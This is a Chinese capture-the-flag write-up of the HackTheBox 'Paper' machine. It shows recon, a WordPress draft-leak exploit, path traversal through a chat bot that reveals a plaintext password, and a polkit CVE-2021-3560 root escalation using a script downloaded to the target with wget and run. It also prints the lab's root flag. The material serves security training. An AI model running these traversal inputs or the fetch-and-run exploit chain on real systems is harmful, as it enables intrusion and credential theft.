Paper-htb-writeup

0x00 靶场技能介绍

章节技能：http数据包分析、CVE-2019-17671漏洞利用、hubot系统目录遍历和文件读取、hubot配置文件泄露、CVE-2021-3560漏洞利用

参考链接：https://0xdf.gitlab.io/2022/06/18/htb-paper.html

参考链接：https://sidthoviti.com/paper-hackthebox-writeup/

0x01 用户权限获取

1、获取下靶机IP地址：10.10.11.143

2、扫描下开放端口信息

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -p- --min-rate=10000 -oG allports 10.10.11.143
[sudo] kali 的密码：
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-28 09:59 CST
Nmap scan report for 10.10.11.143
Host is up (0.27s latency).
Not shown: 65532 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https

Nmap done: 1 IP address (1 host up) scanned in 8.72 seconds

┌──(kali㉿kali)-[~/桌面]
└─$ grep -oP '([0-9]+)/open' allports | awk -F/ '{print $1}' | tr '\n' ','
22,80,443,                                                                                         
┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sV -sC -p22,80,443 -Pn --min-rate=10000 10.10.11.143
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-28 10:05 CST
Nmap scan report for 10.10.11.143
Host is up (0.34s latency).

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
|   256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_  256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp  open  http     Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
|_http-title: HTTP Server Test Page powered by CentOS
| http-methods: 
|_  Potentially risky methods: TRACE
443/tcp open  ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_ssl-date: TLS randomness does not represent time
|_http-title: HTTP Server Test Page powered by CentOS
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2021-07-03T08:52:34
|_Not valid after:  2022-07-08T10:32:34
| tls-alpn: 
|_  http/1.1
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 48.94 seconds

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -p- -sU --min-rate=10000 -oG allports 10.10.11.143          
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-28 10:10 CST
Warning: 10.10.11.143 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.143
Host is up (0.29s latency).
All 65535 scanned ports on 10.10.11.143 are in ignored states.
Not shown: 65456 open|filtered udp ports (no-response), 79 closed udp ports (port-unreach)

Nmap done: 1 IP address (1 host up) scanned in 74.62 seconds

3、扫描下目录信息

┌──(kali㉿kali)-[~/桌面]
└─$ dirsearch -u http://10.10.11.143/                   
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kali/桌面/reports/http_10.10.11.143/__23-12-28_10-14-06.txt

Target: http://10.10.11.143/

[10:14:06] Starting: 
[10:14:26] 403 -  199B  - /.ht_wsr.txt                                      
[10:14:26] 403 -  199B  - /.htaccess.bak1                                   
[10:14:26] 403 -  199B  - /.htaccess.orig                                   
[10:14:26] 403 -  199B  - /.htaccess.sample
[10:14:26] 403 -  199B  - /.htaccess.save
[10:14:26] 403 -  199B  - /.htaccess_extra
[10:14:26] 403 -  199B  - /.htaccess_orig                                   
[10:14:26] 403 -  199B  - /.htaccessOLD
[10:14:26] 403 -  199B  - /.htaccessBAK
[10:14:26] 403 -  199B  - /.htaccess_sc
[10:14:26] 403 -  199B  - /.htaccessOLD2                                    
[10:14:26] 403 -  199B  - /.htm                                             
[10:14:26] 403 -  199B  - /.html                                            
[10:14:26] 403 -  199B  - /.htpasswd_test
[10:14:26] 403 -  199B  - /.httr-oauth                                      
[10:14:26] 403 -  199B  - /.htpasswds
[10:14:29] 403 -  199B  - /.npm/                                            
[10:14:29] 301 -  233B  - /.npm  ->  http://10.10.11.143/.npm/
[10:14:29] 200 -  171B  - /.npm/anonymous-cli-metrics.json                  
[10:14:34] 403 -  199B  - /.user.ini                                        
[10:15:14] 403 -  199B  - /cgi-bin/                                         
[10:15:17] 404 -   16B  - /composer.phar                                    
[10:15:39] 404 -   16B  - /index.php/login/                                 
[10:15:48] 301 -  235B  - /manual  ->  http://10.10.11.143/manual/          
[10:15:48] 200 -    9KB - /manual/index.html
[10:15:59] 404 -   16B  - /php-cs-fixer.phar                                
[10:15:59] 403 -  199B  - /php5.fcgi                                        
[10:16:03] 404 -   16B  - /phpunit.phar                             

Task Completed

4、查看下网站首页内容

5、查看下 http://10.10.11.143/manual/ 目录下的信息

6、通过不断的检索，我们在http的数据包里发现了一个新域名信息

office.paper

7、我们本机下做一下数据绑定

┌──(kali㉿kali)-[~/桌面]
└─$ echo "10.10.11.143 office.paper" | sudo tee -a /etc/hosts
[sudo] kali 的密码：
10.10.11.143 office.paper

8、查看下网站首页信息

9、这里，其实我尝试了目录扫描，以及woscan的扫描、爆破密码爆破，但是我并没有什么有趣的获取，最多就是网站的框架版本。

[+] WordPress version 5.2.3 identified (Insecure, released on 2019-09-04).   

10、我继续回来反复的查看网站的信息，我发现了一些提示信息

11、通过前面获取到的版本信息，我搜索漏洞发现了一个未授权访问的漏洞

┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit wordpress 5.2.3              
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                           |  Path
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi                                                                  | php/webapps/51042.txt
WordPress Core 5.2.3 - Cross-Site Host Modification                                                                      | php/webapps/47361.pl
WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts                                                  | multiple/webapps/47690.md
WordPress Core < 5.3.x - 'xmlrpc.php' Denial of Service                                                                  | php/dos/47800.py
WordPress Plugin DZS Videogallery < 8.60 - Multiple Vulnerabilities                                                      | php/webapps/39553.txt
WordPress Plugin iThemes Security < 7.0.3 - SQL Injection                                                                | php/webapps/44943.txt
WordPress Plugin Rest Google Maps < 7.11.18 - SQL Injection                                                              | php/webapps/48918.sh
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit -m multiple/webapps/47690.md
  Exploit: WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts
      URL: https://www.exploit-db.com/exploits/47690
     Path: /usr/share/exploitdb/exploits/multiple/webapps/47690.md
    Codes: CVE-2019-17671
 Verified: False
File Type: ASCII text
Copied to: /home/kali/桌面/47690.md

┌──(kali㉿kali)-[~/桌面]
└─$ cat 47690.md                            
So far we know that adding `?static=1` to a wordpress URL should leak its secret content

Here are a few ways to manipulate the returned entries:

- `order` with `asc` or `desc`
- `orderby`
- `m` with `m=YYYY`, `m=YYYYMM` or `m=YYYYMMDD` date format


In this case, simply reversing the order of the returned elements suffices and `http://wordpress.local/?static=1&order=asc` will show the secret content: 

12、这里我使用这个漏洞发现了一些有趣的信息

# Secret Registration URL of new Employee chat system
#新员工聊天系统的秘密注册URL

http://chat.office.paper/register/8qozr226AhkCHZdyY

# I am keeping this draft unpublished, as unpublished drafts cannot be accessed by outsiders. I am not that ignorant, Nick.
#我保持这个草案未发布，因为未发布的草案不能被外部人员访问。我没那么无知尼克 

13、这里绑定下这个网站信息，并访问下上面的呢个地址

┌──(kali㉿kali)-[~/桌面]
└─$ echo "10.10.11.143 chat.office.paper" | sudo tee -a /etc/hosts
[sudo] kali 的密码：
10.10.11.143 chat.office.paper

14、可以看到是一个注册的页面，我们注册一下

test
test@qq.com
test123
test123

15、登录后，通过查看聊天框内容，发现了一些有意思的信息

 Receptionitis15 Just call the bot by his name and say help. His name is recyclops.
接待员15只要叫出机器人的名字并说救命。他的名字叫独眼龙。
For eg: sending "recyclops help" will spawn the bot and he'll tell you what you can and cannot ask him.
例如：发送“帮助”将产生机器人，他会告诉你什么你可以和不可以问他。
Now stop wasting my time PAM! I've got work to do!
别再浪费我的时间了！我有工作要做！ 

 kellylikescupcakes Hello. I am Recyclops. A bot assigned by Dwight. I will have my revenge on earthlings, but before that, I have to help my Cool friend Dwight to respond to the annoying questions asked by his co-workers, so that he may use his valuable time to... well, not interact with his co-workers.
凯莉喜欢纸杯蛋糕你好。我是Recyclops。德怀特指派的机器人。我会有我的报复地球人，但在此之前，我必须帮助我的酷朋友德怀特回答他的同事问的恼人的问题，这样他就可以利用他宝贵的时间来.不和同事交流
Most frequently asked questions include:
最常见的问题包括：
- What time is it?
- 现在几点了？
- What new files are in your sales directory?
- 您的销售目录中有哪些新文件？
- Why did the salesman crossed the road?
- 售货员为什么要过马路？
- What's the content of file x in your sales directory? etc.
- 你的销售目录中x文件的内容是什么？等
Please note that I am a beta version and I still have some bugs to be fixed.
请注意，我是一个测试版，我仍然有一些错误要修复。
How to use me ? :
如何使用我？：
1. Small Talk: 1. Small Talk：
You can ask me how dwight's weekend was, or did he watched the game last night etc.
你可以问我德怀特的周末过得怎么样，或者他昨晚看比赛了吗等等。
eg: 'recyclops how was your weekend?' or 'recyclops did you watched the game last night?' or 'recyclops what kind of bear is the best?
你周末过得怎么样？或者‘你昨晚看比赛了吗？或者“什么样的熊是最好的？
2. Joke:
You can ask me Why the salesman crossed the road.
你可以问我为什么售货员要过马路。
eg: 'recyclops why did the salesman crossed the road?'
为什么售货员要穿过马路？'
<=====The following two features are for those boneheads, who still don't know how to use scp. I'm Looking at you Kevin.=====>
<=以下两个特性是为那些还不知道如何使用scp的笨蛋准备的。我看着你，凯文。
For security reasons, the access is limited to the Sales folder.
出于安全原因，访问权限仅限于Sales文件夹。
3. Files:
eg: 'recyclops get me the file test.txt', or 'recyclops could you send me the file src/test.php' or just 'recyclops file test.txt'
例如：'cloops get me the file test.txt'，或'cloops could you send me the file src/test.php'或'cloops file test.txt'
4. List:
You can ask me to list the files
你可以让我列出
5. Time:
You can ask me to what the time is
你可以问我几点了
eg: 'recyclops what time is it?' or just 'recyclops time'
现在几点了？或者只是“马蹄声时间”

16、这里我发现了两个常用的命令信息

recyclops file test.txt

recyclops list sale

17、然后信息检索的时候，发现可以夸目录访问其他目录的信息

recyclops file test.txt

recyclops list sale

下午2点17分
recyclops list ../../
Bot
下午2点17分
Fetching the directory listing of ../../
total 0
drwxr-xr-x. 3 root root 20 Jan 14 2022 .
dr-xr-xr-x. 17 root root 244 Jan 17 2022 ..
drwx------ 11 dwight dwight 281 Feb 6 2022 dwight
下午2点18分
recyclops list ../
Bot
下午2点18分
Fetching the directory listing of ../
total 32
drwx------ 11 dwight dwight 281 Feb 6 2022 .
drwxr-xr-x. 3 root root 20 Jan 14 2022 ..
lrwxrwxrwx 1 dwight dwight 9 Jul 3 2021 .bash_history -> /dev/null
-rw-r--r-- 1 dwight dwight 18 May 10 2019 .bash_logout
-rw-r--r-- 1 dwight dwight 141 May 10 2019 .bash_profile
-rw-r--r-- 1 dwight dwight 358 Jul 3 2021 .bashrc
-rwxr-xr-x 1 dwight dwight 1174 Sep 16 2021 bot_restart.sh
drwx------ 5 dwight dwight 56 Jul 3 2021 .config
-rw------- 1 dwight dwight 16 Jul 3 2021 .esd_auth
drwx------ 2 dwight dwight 44 Jul 3 2021 .gnupg
drwx------ 8 dwight dwight 4096 Sep 16 2021 hubot
-rw-rw-r-- 1 dwight dwight 18 Sep 16 2021 .hubot_history
drwx------ 3 dwight dwight 19 Jul 3 2021 .local
drwxr-xr-x 4 dwight dwight 39 Jul 3 2021 .mozilla
drwxrwxr-x 5 dwight dwight 83 Jul 3 2021 .npm
drwxr-xr-x 4 dwight dwight 32 Jul 3 2021 sales
drwx------ 2 dwight dwight 6 Sep 16 2021 .ssh
-r-------- 1 dwight dwight 33 Dec 27 20:49 user.txt
drwxr-xr-x 2 dwight dwight 24 Sep 16 2021 .vim
下午2点19分
recyclops list ../hubot
Bot
下午2点19分
Fetching the directory listing of ../hubot
total 308
drwx------ 8 dwight dwight 4096 Sep 16 2021 .
drwx------ 11 dwight dwight 281 Feb 6 2022 ..
-rw-r--r-- 1 dwight dwight 0 Jul 3 2021 \
srwxr-xr-x 1 dwight dwight 0 Jul 3 2021 127.0.0.1:8000
srwxrwxr-x 1 dwight dwight 0 Jul 3 2021 127.0.0.1:8080
drwx--x--x 2 dwight dwight 36 Sep 16 2021 bin
-rw-r--r-- 1 dwight dwight 258 Sep 16 2021 .env
-rwxr-xr-x 1 dwight dwight 2 Jul 3 2021 external-scripts.json
drwx------ 8 dwight dwight 163 Jul 3 2021 .git
-rw-r--r-- 1 dwight dwight 917 Jul 3 2021 .gitignore
-rw-r--r-- 1 dwight dwight 174792 Dec 28 01:19 .hubot.log
-rwxr-xr-x 1 dwight dwight 1068 Jul 3 2021 LICENSE
drwxr-xr-x 89 dwight dwight 4096 Jul 3 2021 node_modules
drwx--x--x 115 dwight dwight 4096 Jul 3 2021 node_modules_bak
-rwxr-xr-x 1 dwight dwight 1062 Sep 16 2021 package.json
-rwxr-xr-x 1 dwight dwight 972 Sep 16 2021 package.json.bak
-rwxr-xr-x 1 dwight dwight 30382 Jul 3 2021 package-lock.json
-rwxr-xr-x 1 dwight dwight 14 Jul 3 2021 Procfile
-rwxr-xr-x 1 dwight dwight 5044 Jul 3 2021 README.md
drwx--x--x 2 dwight dwight 193 Jan 13 2022 scripts
-rwxr-xr-x 1 dwight dwight 100 Jul 3 2021 start_bot.sh
drwx------ 2 dwight dwight 25 Jul 3 2021 .vscode
-rwxr-xr-x 1 dwight dwight 29951 Jul 3 2021 yarn.lock
下午2点21分
recyclops file ../hubot/start_bot.sh
Bot
下午2点21分
<!=====Contents of file ../hubot/start_bot.sh=====>
#!/bin/bash
cd /home/dwight/hubot
source /home/dwight/hubot/.env
/home/dwight/hubot/bin/hubot
#cd -
<!=====End of file ../hubot/start_bot.sh=====>
下午2点21分
recyclops file ../hubot/.env
Bot
下午2点21分
<!=====Contents of file ../hubot/.env=====>
export ROCKETCHAT_URL='http://127.0.0.1:48320'
export ROCKETCHAT_USER=recyclops
export ROCKETCHAT_PASSWORD=Queenofblad3s!23
export ROCKETCHAT_USESSL=false
export RESPOND_TO_DM=true
export RESPOND_TO_EDITED=true
export PORT=8000
export BIND_ADDRESS=127.0.0.1
<!=====End of file ../hubot/.env=====>

18、这里，我们结合最上面的wp网站上的 dwight 用户，以及这个密码，我们成功登录上了系统

dwight
Queenofblad3s!23

然后就获取到flag信息，这里，我忘记记录了。。。。

0x02 系统权限获取

19、这里尝试使用 sudo -l ，但是并没有信息获取

[dwight@paper ~]$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for dwight: 
Sorry, user dwight may not run sudo on paper.
[dwight@paper ~]$

20、这里我使用了 linpeas.sh 脚本，进行枚举可以提权的漏洞，但是这里，产生了一个问题，由于我的脚本下载的是最新的，导致并没有出现正确的 CVE-2021-3560 漏洞，卡在这里好久。后面，我通过演练报告，进行后续的提权

https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation

wget https://raw.githubusercontent.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation/main/poc.sh
python -m http.server
wget http://10.10.16.22:8000/poc.sh
vi poc.sh #Change the username and password or use default.
chmod +x poc.sh
./poc.sh
su - sid
sudo bash

21、挂载个网站服务，用于远程下载exp文件

┌──(kali㉿kali)-[~/桌面]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.143 - - [28/Dec/2023 15:02:45] "GET /poc.sh HTTP/1.1" 200 -

[dwight@paper ~]$ ls
bot_restart.sh  hubot  linpeas.sh  sales  user.txt
[dwight@paper ~]$ wget http://10.10.14.3/poc.sh
--2023-12-28 02:02:44--  http://10.10.14.3/poc.sh
Connecting to 10.10.14.3:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9627 (9.4K) [text/x-sh]
Saving to: 'poc.sh'

poc.sh                 100%[===========================>]   9.40K  --.-KB/s    in 0s      

2023-12-28 02:02:45 (106 MB/s) - 'poc.sh' saved [9627/9627]

22、开始使用漏洞进行提权，并获取到最终的flag信息

[dwight@paper ~]$ vim ./poc.sh 
[dwight@paper ~]$ chmod +x poc.sh
[dwight@paper ~]$ ./poc.sh

[!] Username set as : shiyan
[!] No Custom Timing specified.
[!] Timing will be detected Automatically
[!] Force flag not set.
[!] Vulnerability checking is ENABLED!
[!] Starting Vulnerability Checks...
[!] Checking distribution...
[!] Detected Linux distribution as "centos"
[!] Checking if Accountsservice and Gnome-Control-Center is installed
[+] Accounts service and Gnome-Control-Center Installation Found!!
[!] Checking if polkit version is vulnerable
[+] Polkit version appears to be vulnerable!!
[!] Starting exploit...
[!] Inserting Username shiyan...
Error org.freedesktop.Accounts.Error.PermissionDenied: Authentication is required
id: 'shiyan': no such user
[x] Insertion of Username failed!
[!] Aborting Execution!
[!] Usually multiple attempts are required to get the timing right. Try running the exploit again.
[!] If the exploit doesn't work after several tries, then you may have to exploit this manually.
[dwight@paper ~]$ ./poc.sh

[!] Username set as : shiyan
[!] No Custom Timing specified.
[!] Timing will be detected Automatically
[!] Force flag not set.
[!] Vulnerability checking is ENABLED!
[!] Starting Vulnerability Checks...
[!] Checking distribution...
[!] Detected Linux distribution as "centos"
[!] Checking if Accountsservice and Gnome-Control-Center is installed
[+] Accounts service and Gnome-Control-Center Installation Found!!
[!] Checking if polkit version is vulnerable
[+] Polkit version appears to be vulnerable!!
[!] Starting exploit...
[!] Inserting Username shiyan...
Error org.freedesktop.Accounts.Error.PermissionDenied: Authentication is required
[+] Inserted Username shiyan  with UID 1005!
[!] Inserting password hash...
[!] It looks like the password insertion was succesful!
[!] Try to login as the injected user using su - shiyan
[!] When prompted for password, enter your password 
[!] If the username is inserted, but the login fails; try running the exploit again.
[!] If the login was succesful,simply enter 'sudo bash' and drop into a root shell!
[dwight@paper ~]$ su - sid
su: user sid does not exist
[dwight@paper ~]$ su shiyan
Password: 
[shiyan@paper dwight]$ id
uid=1005(shiyan) gid=1005(shiyan) groups=1005(shiyan),10(wheel)
[shiyan@paper dwight]$ sudo bash

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for shiyan: 
[root@paper dwight]# id
uid=0(root) gid=0(root) groups=0(root)
[root@paper dwight]# cat /root/root.txt
135686c445f7f323d89ed243189f1d00
[root@paper dwight]# 

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/432